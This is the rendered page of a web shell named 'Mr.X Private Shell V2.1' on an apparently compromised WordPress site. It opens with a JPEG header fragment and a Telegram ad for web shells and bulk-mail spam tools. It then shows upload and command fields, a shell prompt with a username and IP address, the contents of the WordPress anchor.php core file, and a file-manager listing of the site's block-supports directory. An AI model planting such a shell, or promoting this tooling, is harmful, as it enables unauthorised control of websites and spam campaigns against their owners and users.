����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.143: ~ $
<?php
/**
 * Anchor block support flag.
 *
 * @package WordPress
 * @since 7.0.0
 */

/**
 * Registers the anchor block attribute for block types that support it.
 *
 * @since 7.0.0
 * @access private
 *
 * @param WP_Block_Type $block_type Block Type.
 */
function wp_register_anchor_support( WP_Block_Type $block_type ) {
	if ( ! block_has_support( $block_type, array( 'anchor' ) ) ) {
		return;
	}

	if ( ! isset( $block_type->attributes ) ) {
		$block_type->attributes = array();
	}

	if ( ! array_key_exists( 'anchor', $block_type->attributes ) ) {
		$block_type->attributes['anchor'] = array(
			'type' => 'string',
		);
	}
}

/**
 * Add the anchor id to the output.
 *
 * @since 7.0.0
 * @access private
 *
 * @param WP_Block_Type        $block_type       Block Type.
 * @param array<string, mixed> $block_attributes Block attributes.
 * @return array<string, string> Attributes with block anchor id.
 */
function wp_apply_anchor_support( WP_Block_Type $block_type, array $block_attributes ): array {
	if ( empty( $block_attributes ) ) {
		return array();
	}

	if ( ! block_has_support( $block_type, array( 'anchor' ) ) ) {
		return array();
	}

	if ( ! isset( $block_attributes['anchor'] ) || ! is_string( $block_attributes['anchor'] ) || '' === $block_attributes['anchor'] ) {
		return array();
	}

	return array( 'id' => $block_attributes['anchor'] );
}

// Register the block support.
WP_Block_Supports::get_instance()->register(
	'anchor',
	array(
		'register_attribute' => 'wp_register_anchor_support',
		'apply'              => 'wp_apply_anchor_support',
	)
);

Filemanager

Name Type Size Permission Actions
align.php File 1.67 KB 0644
anchor.php File 1.54 KB 0755
aria-label.php File 1.65 KB 0755
auto-register.php File 2.18 KB 0755
background.php File 4.05 KB 0644
block-style-variations.php File 9.28 KB 0755
block-visibility.php File 5.23 KB 0755
border.php File 6.1 KB 0755
colors.php File 5.39 KB 0755
custom-classname.php File 1.64 KB 0644
custom-css.php File 9.37 KB 0755
dimensions.php File 5.21 KB 0755
duotone.php File 2.67 KB 0644
elements.php File 8.2 KB 0755
error_log File 104.6 KB 0644
generated-classname.php File 1.7 KB 0644
layout.php File 42.31 KB 0755
position.php File 4.01 KB 0755
settings.php File 4.45 KB 0755
shadow.php File 2.04 KB 0644
spacing.php File 2.68 KB 0755
typography.php File 27.68 KB 0755
utils.php File 1011 B 0644